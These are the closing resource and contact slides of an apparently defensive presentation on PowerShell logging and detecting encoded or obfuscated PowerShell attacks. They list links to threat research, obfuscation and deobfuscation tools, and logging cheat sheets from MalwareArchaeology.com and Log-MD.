  • 64. Shout Out • This is one DAMN GOOD Report • I use it in my Malicious Discovery Training • Palo Alto Networks – “Pulling Back the Curtains on EncodedCommand PowerShell Attacks” • https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the- curtains-on-encodedcommand-powershell-attacks/ • GREAT analysis on the Fu the bad guys use that will help you craft your queries and alerts • Actual spelling of the pwnage, etc. MalwareArchaeology.com
  • 65. Resources • https://www.invincea.com/2017/03/powershell-exploit-analyzed-line-by-line/ List of Tools • https://github.com/emilyanncr/Windows-Post-Exploitation Obfuscation • http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation- usage-guide • http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation- usage-guide-part-2 • https://github.com/danielbohannon/Revoke-Obfuscation • https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke- obfuscation-report.pdf • https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the- wild.html Metasploit Check Logging module • https://github.com/darkoperator/Meterpreter-Scripts/tree/master/scripts MalwareArchaeology.com
  • 66. Resources LOG-MD.COM • Websites – Log-MD.com The tool • The “Windows PowerShell Logging Cheat Sheet(s)” • All the other Cheat Sheets too – MalwareArchaeology.com
  • 67. Questions? LOG-MD.COM You can find us at: • Log-MD.com • @HackerHurricane • MalwareArchaeology.com • HackerHurricane.com (blog)